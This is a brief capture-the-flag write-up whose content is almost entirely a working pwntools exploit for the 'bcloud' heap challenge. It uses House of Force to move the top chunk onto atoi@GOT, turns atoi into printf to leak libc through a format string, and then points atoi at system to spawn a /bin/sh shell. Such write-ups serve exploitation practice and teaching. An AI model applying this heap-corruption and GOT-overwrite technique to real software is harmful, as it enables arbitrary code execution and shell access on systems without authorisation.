This is a problem solved with House of Force.
While solving it the exploit strangely would not work, so I referred to someone else's code.
exploit code

```python
from pwn import *

r = process("./bcloud")
elf = ELF("./bcloud")

# Name input: the 64-byte name is echoed back together with the heap pointer
# stored right after it, which leaks the address of the name chunk.
print(r.recv())
r.send(b"A" * 64)
r.recvuntil(b"A" * 64)
chunk = u32(r.recv(4))

printf_plt = elf.plt["printf"]
atoi_got = elf.got["atoi"]

# The top chunk lies 0xd8 past the leaked chunk; "house" is the request size
# that moves the top chunk right in front of atoi@GOT.
topchunk = chunk + 0xd8
house = atoi_got - topchunk - 8 - 4
log.info("atoi_got = {}".format(hex(atoi_got)))
log.info("TOP chunk = {}".format(hex(topchunk)))
log.info("house of force = {}".format(hex(house)))

# Org/Host input: the overflow sets the top chunk size to 0xffffffff.
r.recvuntil(b"Now let's set synchronization options.")
print(r.recvuntil(b"Org:"))
r.send(b"B" * 64)
print(r.recvuntil(b"Host:"))
r.sendline(p32(0xffffffff) * 2)

# First note: the oversized request relocates the top chunk next to the GOT.
r.recvuntil(b">>")
r.sendline(b"1")
print(r.recvuntil(b"Input the length of the note content:"))
r.sendline(str(house).encode())

# Second note: its content overwrites atoi@GOT with printf@plt.
print(r.recvuntil(b">>"))
r.sendline(b"1")
print(r.recvuntil(b"Input the length of the note content:"))
r.sendline(b"8")
print(r.recvuntil(b"Input the content:"))
r.sendline(b"AAAA" + p32(printf_plt))

# Menu input is now passed to printf: a format string leaks a libc pointer.
print(r.recv(1024))
r.sendline(b"%p " * 20)
print(r.recvuntil(b"0x10 0xa "))
leaked_addr = int(r.recv(10), 16)
print(hex(leaked_addr))

libc_base = leaked_addr - 0x49670
system = libc_base + 0x3ada0
log.info("libc_base = {}".format(hex(libc_base)))
log.info("system = {}".format(hex(system)))

# printf("333") returns 3, which selects the edit option; printf("1") returns 1.
print(r.recvuntil(b">>"))
r.sendline(b"333")
print(r.recvuntil(b"id:"))
r.sendline(b"1")
print(r.recvuntil(b"content:"))
# Editing note 1 replaces atoi@GOT with system.
r.send(b"AAAA" + p32(system))
print(r.recv())
# The next menu input goes to system().
r.sendline(b"/bin/sh\x00")
r.interactive()
```